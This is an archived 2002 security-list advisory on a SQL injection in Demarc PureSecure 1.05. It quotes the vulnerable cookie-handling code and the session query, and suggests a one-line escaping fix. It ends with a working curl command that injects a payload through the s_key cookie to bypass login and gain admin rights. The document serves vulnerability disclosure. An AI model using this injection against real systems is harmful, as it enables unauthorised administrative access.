Demarc PureSecure 1.05 may be other (user can bypass login)

From: pokleyzz sakamaniaka (pokleyzzat_private)
Date: Mon Apr 15 2002 - 00:32:18 PDT

Next message: Dr Andreas F Muller: "Vulnerability in HP Photosmart/Deskjet Drivers for Mac OS X (root compromise)"

Previous message: Andreas Sandblad: "About: Using the backbutton in IE is dangerous"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Demarc PureSecure (http://www.demarc.org) is an all-inclusive network monitoring solution that allows you to monitor an entire network of servers from one powerful web interface. user can bypass login and get admin status by sql injection through cookies s_key --------- line 319 ------------------------------ elsif (($cookies{'s_key'}) && ($cookies{'s_key'}- >value)){ $logged_in_as = &check_login($cookies {'s_key'}->value); if (!$logged_in_as){ &print_login_screen; &safe_exit; } ----------------------------------------------------- s_key = will be use for sql in fuction check_login query ( line 6114) ---------lini 6114--------------------------------- $sql_query = " SELECT \ f1,f2,f3,admin,username,UNIX_TIMESTAMP (current_login_timedate) AS LOGINTIME \ FROM \ dm_sessions \ WHERE current_session_id = '$session_id' "; ----------------------------------------------------- -=solution=- line 6113: &safe_slash(\$session_id' ); using curl (http://curl.haxx.se/download/): curl -b s_key=\'%20OR%20current_session_id% 20like%20\'%\'%23 https:// host>/dm/demarc http://www.inetd-secure.net http://www.mybsd.org

Next message: Dr Andreas F Muller: "Vulnerability in HP Photosmart/Deskjet Drivers for Mac OS X (root compromise)"
Previous message: Andreas Sandblad: "About: Using the backbutton in IE is dangerous"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 12:38:50 PDT